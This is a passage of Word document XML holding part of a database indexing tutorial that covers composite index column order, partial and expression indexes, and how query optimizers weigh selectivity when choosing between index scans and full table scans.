        <w:t>Rule: query must use a contiguous LEFT PREFIX of the index columns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="350DE717" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How to choose column order:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716729A1" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1463"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Equality conditions first</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> (columns used with =).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB5023F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1463"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Range conditions last</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> (columns used with &gt;, &lt;, BETWEEN).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4423EEFF" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1463"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>High selectivity columns first</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> (columns that filter out the most rows).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31948ABF" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9BA09F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Query: WHERE status = 'active' AND created_at &gt; '2024-01-01' AND customer_id = 42</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6DC86F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="21AF078B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Best index: (customer_id, status, created_at)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C12255" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  customer_id = 42:    filters to ~1000 rows (high selectivity, equality)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564EF19E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  status = 'active':   filters to ~700 rows (equality)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9812F7" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  created_at &gt; ...:    range scan on remaining (range condition LAST)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1C5C08" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.5 Partial Index (Filtered Index)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="610371A0" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What it is:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> An index that only includes rows matching a predicate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C2AF558" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77131239" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>CREATE INDEX idx_active_users ON users(email) WHERE status = 'active';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31AF0C12" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Only indexes rows where status = 'active'.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> If 90% of users are active, this index is slightly smaller than a full index. But if only 5% are active, the index is 20x smaller.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236ECFA7" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use cases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D210D96" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1464"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>Index only unprocessed records: WHERE processed = false (queue-like patterns).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28131E1E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1464"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>Index only recent data: WHERE created_at &gt; '2024-01-01'.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00772AA9" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1464"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>Index only non-null values: WHERE deleted_at IS NULL (soft-delete patterns).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76AC4CFD" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Benefits:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B127D92" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1465"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>Smaller index → fits in memory more easily → faster lookups.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F683291" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1465"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>Fewer entries to maintain on writes → less write overhead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B68A70F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1465"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>More targeted → higher hit ratio.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78DDE81A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.6 Expression Index (Functional Index)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="741E1ECF" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What it is:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> An index on the result of a function/expression, not just a raw column.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4290E4A8" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA0EBCE" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>CREATE INDEX idx_lower_email ON users(LOWER(email));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77831174" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="7A418440" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Now this query can use the index:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7B87DB" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>SELECT * FROM users WHERE LOWER(email) = 'alice@example.com';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2417B919" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="3D24B412" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Without the expression index, this query would scan the entire table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441CF506" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- (regular index on email doesn't help when function is applied)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F0C2E5" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Common use cases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20718B42" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF82211" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Case-insensitive search</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503FBDC4" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>CREATE INDEX idx ON users(LOWER(name));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385FEF01" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="5360DB4B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Date extraction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C9B598" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>CREATE INDEX idx ON events(DATE(created_at));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664870E4" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="041FD185" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- JSON field access (PostgreSQL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B58400" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>CREATE INDEX idx ON products((data-&gt;&gt;'category'));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7595E60A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="12A6F902" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Computed columns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AAB8071" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>CREATE INDEX idx ON orders((quantity * price));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106B4A2B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:pict w14:anchorId="2EF7CDAF">
          <v:rect id="_x0000_i5325" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F09024C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6. How the Query Optimizer Uses Indexes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17AA2409" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6.1 The Optimizer's Decision</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75351BA6" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>The query optimizer decides whether to USE an index or do a full scan. It's NOT always better to use an index.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117299DB" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>When the optimizer chooses a full scan over an index:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7485256C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F98949" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Table: 1 million rows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A148279" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Query: SELECT * FROM orders WHERE status = 'completed'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FDE2456" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Selectivity: 80% of orders are 'completed'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3824E2EA" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="7A220598" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Index approach:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063D8937" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  800,000 index lookups → 800,000 random I/O operations to heap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C5B32A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  = Very slow (random I/O is expensive)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1876FDDE" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="27F5FC8D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Full scan approach:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E681F8" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Read all pages sequentially (sequential I/O)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0014CB48" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  = Faster! Sequential I/O is 100x faster than random per byte.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C747DF" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Rule of thumb:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> If a query matches more than ~5–15% of the table, a full scan is usually faster than an index scan (because sequential I/O beats random I/O).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501D1120" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6.2 Index Selectivity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0626DB4F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Selectivity</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> = fraction of rows that match a condition. Low selectivity = many matches = index less useful.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB821A5" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01EF7669" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>High selectivity (use index):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9E47D9" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  WHERE email = 'alice@example.com'     → matches 1 row out of 10M (selectivity: 0.00001%)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05374866" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  WHERE id = 42                         → matches 1 row</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E11F23" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="3B745064" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Low selectivity (full scan may be better):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="783CDB86" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  WHERE gender = 'F'                    → matches 50% of rows (selectivity: 50%)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51BEA3A8" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  WHERE status = 'active'               → matches 90% of rows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1999472A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  WHERE country = 'US'                  → matches 40% of rows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="284BD5A6" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cardinality:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> The number of distinct values in a column.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00500E69" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1466"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>High cardinality (email, UUID, phone): excellent for indexing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A45821A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1466"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>Low cardinality (boolean, status enum, gender): poor for B-Tree indexing (bitmap index may work).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="779CDC83" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6.3 Index-Only Scan vs. Index Scan + Heap Fetch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C47738" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="271E8579" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Index-only scan (covering index):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F33C89" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  Read index only → return results directly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06663BD9" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  I/O: index pages only (few, sequential)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B12B2C6" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Speed: Very fast</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37611F96" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="2405862D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Index scan + heap fetch:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F9272C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Read index → get row pointers → fetch each row from heap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B6066A7" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  I/O: index pages + random heap I/O per row</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C4ED9D5" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Speed: Depends on number of rows (many rows = many random reads = slow)</w:t>
      </w:r>
    </w:p>
